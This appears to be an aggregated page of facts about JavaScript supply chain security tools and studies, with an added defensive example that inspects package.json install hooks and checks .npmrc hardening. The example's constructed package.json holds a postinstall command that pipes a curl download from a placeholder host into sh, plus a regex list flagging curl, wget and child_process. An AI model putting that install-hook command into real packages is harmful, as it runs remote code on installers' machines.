JavaScript
Facts (10)
Sources
bureado/awesome-software-supply-chain-security - GitHub github.com 7 facts
[reference] google/oss-rebuild automates reproducible building and generates SLSA Provenance for Python, JavaScript/TypeScript, and Rust packages to detect supply chain compromises, featuring build observability, dynamic analysis, and support for historical package attestation.
[reference] sns45/forgeseal is a supply chain security command-line interface for JavaScript and TypeScript that generates CycloneDX Software Bill of Materials (SBOMs), signs them using Sigstore keyless signing, produces SLSA v1 provenance attestations, and triages vulnerabilities using OSV.dev.
[claim] Socket is a tool focused on JavaScript that allows users to find and compare millions of open source packages.
[reference] The SAP-samples/risk-explorer-execution-pocs repository provides runnable proof-of-concept implementations that demonstrate how third-party dependencies can achieve arbitrary code execution at both install time and runtime across multiple ecosystems, including Python, JavaScript, Ruby, PHP, Rust, Go, and Java.
[claim] The sonatype-nexus-community/auditjs tool audits JavaScript projects using Sonatype OSS Index or Nexus Lifecycle.
[reference] HuskyCI, developed by Globo.com, orchestrates security tests and centralizes results for analysis across multiple programming languages including Python, Ruby, JavaScript, Go, Java, and HCL, utilizing SAST tools, GitLeaks for secrets scanning, and SCA tools.
[reference] knostic/OpenAnt is an LLM-based vulnerability discovery tool that proactively identifies verified security flaws while minimizing false positives and negatives, supporting Go, Python, JavaScript/TypeScript, C/C++, PHP, and Ruby.
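The install-time execution path that the SAP-samples/risk-explorer-execution-pocs fact above refers to is, for JavaScript, the npm lifecycle scripts a dependency declares in its package.json. The example below is added here and is not code from that repository or from any project on this page: it takes a constructed package.json for a hypothetical dependency "left-shim", lists the hooks npm would run during `npm install`, flags the obviously hostile one, and checks an `.npmrc` for the `ignore-scripts=true` setting that stops dependencies' lifecycle scripts from running at all. The package name, the command string and the URL are made up for illustration.

```javascript
// Added example, not from SAP-samples/risk-explorer-execution-pocs.
// npm runs these package.json lifecycle scripts automatically when a
// package is installed as a dependency, so a compromised package only
// needs to declare one of them to get code execution on every install.
const INSTALL_TIME_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Constructed package.json of a hypothetical dependency "left-shim".
// The postinstall entry is the entire attack: a shell command on install.
// The URL is a placeholder and does not exist.
const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: "left-shim",
  version: "1.0.3",
  scripts: {
    test: "node test.js",
    postinstall:
      "node -e \"require('child_process').execSync('curl -s https://example.invalid/x | sh')\"",
  },
});

// Return the lifecycle scripts a package would execute at install time.
function findInstallHooks(packageJsonText) {
  const pkg = JSON.parse(packageJsonText);
  const scripts = pkg.scripts || {};
  return INSTALL_TIME_HOOKS.filter((hook) => typeof scripts[hook] === "string")
    .map((hook) => ({ hook, command: scripts[hook] }));
}

// Crude triage heuristics: network fetches, process spawning, eval, or
// base64 blobs inside an install hook deserve a human look before install.
const SUSPICIOUS_PATTERNS = [
  /\b(curl|wget)\b/i,
  /child_process|execSync|spawn/i,
  /\beval\b/i,
  /base64/i,
];

function triageHooks(hooks) {
  return hooks.map(({ hook, command }) => ({
    hook,
    command,
    suspicious: SUSPICIOUS_PATTERNS.some((re) => re.test(command)),
  }));
}

// Hardened install configuration. With ignore-scripts=true in .npmrc (or
// `npm ci --ignore-scripts`), npm skips dependencies' lifecycle scripts, so
// the postinstall above never runs. Explicit `npm run <name>` still works.
const HARDENED_NPMRC = "ignore-scripts=true\n";

// Minimal .npmrc parser: key=value lines, '#' and ';' comments ignored.
function parseNpmrc(text) {
  const settings = {};
  for (const raw of text.split("\n")) {
    const line = raw.trim();
    if (!line || line.startsWith("#") || line.startsWith(";")) continue;
    const eq = line.indexOf("=");
    if (eq === -1) continue;
    settings[line.slice(0, eq).trim()] = line.slice(eq + 1).trim();
  }
  return settings;
}

function isInstallHardened(npmrcText) {
  return parseNpmrc(npmrcText)["ignore-scripts"] === "true";
}

// Stand-alone run: show what the sample package would do and whether the
// hardened configuration would stop it.
console.log(JSON.stringify(triageHooks(findInstallHooks(SAMPLE_PACKAGE_JSON)), null, 2));
console.log("install scripts disabled:", isInstallHardened(HARDENED_NPMRC));
```

The caveat a practitioner needs: `ignore-scripts=true` also skips the legitimate postinstall builds some packages rely on (native addons compiled via node-gyp, for instance), so after adopting it you run those few builds explicitly, which is exactly the allow-list you want. The regex triage is a hint, not a verdict; an install hook that simply runs `node setup.js` is invisible to it, so review the script file too.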
A Mixed-Methods Study of Open-Source Software Maintainers On ... arxiv.org Feb 3, 2025 2 facts
[reference] Hassan Onsori Delicheh, Alexandre Decan, and Tom Mens quantified security issues in reusable JavaScript actions within GitHub workflows in a 2024 study published in the Proceedings of the 21st International Conference on Mining Software Repositories.
[reference] Vinuri Bandara, Thisura Rathnayake, Nipuna Weerasekara, Charitha Elvitigala, Kenneth Thilakarathna, Primal Wijesekera, and Chamath Keppitiyagama analyzed real-world remediation of fix commits in JavaScript projects in a 2020 study published in the IEEE 20th International Working Conference on Source Code Analysis and Manipulation.
The Complete Guide to Open Source Licenses - FOSSA fossa.com 1 fact
[claim] Different programming communities have established licensing norms, such as JavaScript projects commonly using the MIT license and Java projects often using the Apache 2.0 license.